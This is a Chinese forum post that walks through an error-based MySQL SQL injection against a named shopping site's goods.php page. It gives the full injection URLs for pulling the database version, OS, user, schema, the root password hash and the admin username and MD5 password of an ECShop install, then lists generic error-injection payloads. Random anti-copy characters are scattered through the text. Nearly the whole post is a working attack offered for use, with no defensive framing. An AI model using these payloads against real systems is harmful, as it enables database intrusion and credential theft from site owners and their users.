找回密码
 立即注册
查看: 2825|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 ( _: k  X- p% r' N2 l8 L
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 Y, u* \1 n" J) w4 f0 z  J: L

. E; ^; ?+ W; u5 ?判断系统0 d: J& l$ T) {; m$ P
, Q7 M+ I4 y1 T7 Z
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
! M0 ^. c9 o& H; z9 Z8 K
! j6 u* C: k9 ~* m$ \
: O$ a% f' f  m
. b* Q8 ?/ S* f- j) s+ s7 N0 h当前 user()
/ K$ `& u  T8 }. P/ V6 e/ f4 z8 {2 J
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23; c2 t( B! D# C% y
3 C# N& k! C; n, w- l6 }
8 [$ k7 _' x' H0 V

0 S0 W, r# Z( v2 J/ K4 o2 O当前 database()
. {6 n2 _. @% L1 g8 Ghttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%232 {$ X  X1 W4 k( \
7 I5 m0 Z+ a& q0 ^- e

$ K6 s. N8 J2 t5 }1 h) X& w" L  [' L+ z" O: y3 z
8 Z1 F8 d$ C4 V6 V7 j8 ^
root hash9 S( x/ A- O$ w

; f- _: ]7 G4 T& phttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
: q5 g# W- |0 t; B# f$ ~- ^& [; t, o8 N. y
) ~7 D4 L; o) `& V" m1 M
& C  x! }0 |- R+ p
当前 数据库表名
  K1 [' i1 [: N6 E' f2 j3 P, ~; p9 r1 ~3 I
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%232 O) }( a3 h7 a8 a# Y" \

( Q( s7 T; p; z& @. c8 t- e% Q
, `4 r- F3 C1 h
: K/ Q  j; _$ y. w' i当前 数据库 user_name 字段
. x# ~! _# r8 X6 U* t
. U, U6 F. G* x( Q) Lhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23: g) _. o1 Q- F
9 [% k- C" Y! i0 I( E
当前 数据库 字段 password
8 v  \+ I2 j3 J4 ~* Jhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 A8 {% B. ^8 S
- p6 \6 X  e: `( {
$ R$ r' _& b# x$ t, ?2 `) z

! c) L- g9 [& I, Y/ |2 O. n获得 admin passwd(md5)7 Y* {! O# o% \1 R8 q3 L, Z
0 _) F( e/ j5 ]+ ?& p

8 A( p" C  r) Vhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%239 {) O# s( \! l, U6 }

& \: L# m! h) `& E1 ?; j, h报错注射
4 ]! r& Z9 {7 h% i- S! Z! ~SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a), M% S3 `7 Q- x) O- Z

& o7 h9 A- u" xSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)$ w# G, f8 [$ q5 Q* D( ]
! w0 R) B; u3 `  b
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表